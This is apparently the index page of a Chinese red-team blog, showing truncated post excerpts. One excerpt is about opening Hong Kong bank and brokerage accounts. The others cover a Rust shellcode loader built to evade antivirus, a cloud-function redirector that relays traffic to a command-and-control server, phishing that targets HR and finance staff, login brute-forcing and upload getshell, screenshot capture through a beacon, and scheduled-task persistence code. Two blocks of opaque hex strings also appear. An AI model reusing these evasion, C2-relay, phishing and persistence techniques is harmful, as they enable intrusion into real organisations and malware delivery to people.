Hyyrent blog

前言今天不聊安全技术，聊聊投资交易的事情，deepseek的崛起带动中概股的重新评级，最近这段时间港科技也是呈现整体上涨的趋势，如果我们想趁这波行情分一杯羹，投资港美股是最好不过的选择。 购买港美股需要两样关键东西：港卡+任意券商 港卡申请常见的有汇丰、中银香港等（推荐，支持线上办理） 线上开户：在香港接入当地wifi，出入境证明截图（小程序移民局12367） 坑点： 中银香港不能使用iphone16系列机型，镜头焦距问题导致无法识别证件 姓名如果是两个字的，因为重名问题线上大概率不予通过，这时候只能线下walk in了 开户的时候收入不要写太多，不然需要提供收入证明 详细教程链接： https://www.xiaohongshu.com/explore/674c66e00000000007034334?app_platform=ios&app_version=8.63&share_from_user_hidden=true&xsec_source=app_share&type=normal&xsec_token=CB7Wg094LJ-QJw ...

Rustloader免杀生成器开发背景由于近年来go用来做免杀器越来越普遍，导致杀软对go编译程序静态查杀力度增大，因此转型投入rust的怀抱 说实话，rust的语法是真难懂，边改边查参考github代码总算是捏出来了 加载方式 使用LoadLibraryA和GetProcAddress从ntdll获取NtQueueApcThreadEx函数。 使用VirtualAlloc分配远程内存。 使用STD::PTR::COPY将SHELLCODE复制到分配的内存。 使用VirtualProtect将内存权限更改为可执行文件。 使用GetCurrentThread获取当前线程句柄。 使用NtQueueApcThreadEx执行SHELLCODE 使用方式和我之前开发的go千机一样，一样是一键化生成，别问，问就是为了最大化的简便，目录结构如下 解压打开文件目录，把 beacon_x64.bin 放置在当前目录下，点击 一键生成.bat 输出免杀文件在 output 文件夹下，随机六位数命名 捆绑文件选择捆绑文件存放在 bundle 文件夹下，默认放置打开损坏文档 如果不需要捆绑文件，把ma ...

简易蜜罐设计流程设计要点部署方式尽量简便，适配环境兼容性高，与客户实际网络环境单独隔离，防止作为跳板进行横向 水坑攻击 部署仿真系统系统攻击者进行攻击 仿真系统需提供接口供攻击队扫描识别漏洞 通过js水坑触发安全控件弹窗诱使攻击者安装 不安装则会重定向到首页 代码实现 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from flask import Flask, send_from_directory, request, make_responseapp = Flask(__name__, static_folder='static')@app.route('/')def index(): return send_from_directory(app.static_folder, '1.html')@app.route('/test.exe')d ...

开发背景今天好兄弟打项目时候碰到这么一个情况，目标机器访问内网应用需要连接VPN，会切断外网连接，导致beacon无法及时执行回显命令 为了证明能够突破隔离，需要目标机器访问内网应用的截图，于是简单写了下，当作记录 代码实现go build -trimpath -ldflags="-s -w -H windowsgui" main.go 为了避免后续beacon掉线导致进程一直执行，需要设置生成次数限制 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455package mainimport ( "fmt" "image/png" "os" "path/filepath" "time" "github.com/vova616/screenshot")func main() { //路径 s ...

573c9136887dd3c10ac91ab197c13a96b784871495672aa585ffee31d6f40e013c53864c5823bcd71b7854b059b5710564c158aae16c011554207d7400c1120040828bd4c48457f924171f28f3e9badf31c0c9ec90f9e80610ee88e16dd4a50a235b1f1fa0378a3f639256df0d07d9c3438c3ae28f23791756489eedeb39a576173acce25893cdd702b732c21c49943146e0154069e7a260bf6d023d59a17b77c35c7deb4a4885c78c03c1772544628bd5cecdd48a467465a2257796587dd4b768fcad3c03db07e03a11a960b5085f9a56a580dd066e010098e998ea909c1206bb942303f670dbc4a64986e04981b34dfd13c77ba30bc7565 ...

cbd6f2c07a534cf88d3655f88e3f0065671c1e8f29ae7ff190de02afd711ca5cae147bb433f7779110a70e5dd31a1ce0ce9d5784827302c1ce9237a967ff9cff52acfaf9c668748a1f517ca01f1afd72814d958d3884685eea4696ea53d977c3c60f4bc1f6d5e1390b284a12d8a4cd503969c3f2522611afe3b2786375097ccf08f356c3af922b2e1c77b2b58bc1fc76af3a9c7a799d66b0e564017ba6def25ebc166ec322812262cf2a58b7c694b4157ba8487241b9363d19c025b32c957011f5aa0ce7f64d97cb64df4a9584cd9341af7234832e9ebdea8d6c194e74ecd3a5065bf871453387784377923f00ee08f6855af17a9f7896318 ...

云函数新建一个云函数，在代码位置进行修改 首先导入 yisiwei.zip 的云函数包 12345678910111213141516171819# -*- coding: utf8 -*-import json, requests, base64def main_handler(event, context): C2 = 'https://49.xx.xx.xx' # 这里可以使用 HTTP、HTTPS~下角标~ path = event['path'] headers = event['headers'] print(event) if event['httpMethod'] == 'GET': resp = requests.get(C2 + path, headers=headers, verify=False) else: resp = requests.post(C2 + path, data=event[ ...

红队外网打点实战案例分享从最基础的登录框突破登录框作为hw出现场次最多的角色，也是最容易出洞的，下面介绍一些自己常用的测试方法 登录爆破小技巧 像这种系统的爆破我们有两种解决方法： 分析前端加密算法，写脚本模拟对密码进行加密 固定密码为123456 000000 使用常见的用户名作为字典进行爆破 两种方法各有优劣，我更倾向于第二种，在比赛打点效率会更高，分析加密算法更适用于红队检测项目 使用爆破的账号密码登入后台，便可以继续寻找后台上传点 看到图片类型这里限制上传的文件格式 直接添加 aspx 文件格式类型 成功getshell 修改返回数据包参数进入后台有些时候网站登录状态是根据前端判断的，这时候我们就可以直接修改返回包进行绕过 前端判断登录逻辑根据返回包的ret值决定，当返回值为1则成功登录 成功进入后台 插件探测常见sql注入和log4j漏洞sql注入插件推荐 https://github.com/smxiazi/xia_sql 基本原理是通过发送多个数据包，根据返回数据长度判断是否存在注入 除了被动扫描以外，我们还可以通过手动添加单引号、双引号去查看返回包 ...

简述钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口进行深入利用，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集大批量邮箱搜集大批量邮箱搜集可通过 https://app.snov.io/ http://www.skymem.info/ 搜索引擎但一般来说，企业邮箱都存在邮服网关，邮件很难投递，所以我们要选择私人邮箱或不被邮服拦截的邮箱 比如说 xx举报，xx招聘面对大众的邮箱，相关语法： 12345site:"xxx.com" 举报site:"xxx.com" 招聘xx公司举报 @126.comxx公司招聘 @qq.com 钓鱼手法社工钓鱼1、首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，避开信息安全部 2、选择目标公司分部进行钓鱼成功率较高，前期提前想好话术和应变对策，避免被识破 2、社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木 ...

在攻防中，上线机器总是需要手动进行维权，太过于麻烦，何不直接上线即维权呢，直接放核心代码，当做个记录 https://github.com/capnspacehook/taskmaster 12345678910111213141516171819202122232425262728293031323334353637383940package mainimport ( "os" "github.com/capnspacehook/taskmaster")func runWinTask(path string) { // 创建初始化计划任务 taskService, _ := taskmaster.Connect() defer taskService.Disconnect() // 定义新的计划任务 newTaskDef := taskService.NewTaskDefinition() // 添加执行程序的路径 newTaskDef.AddAction(taskmaster.ExecAction{ Path: path ...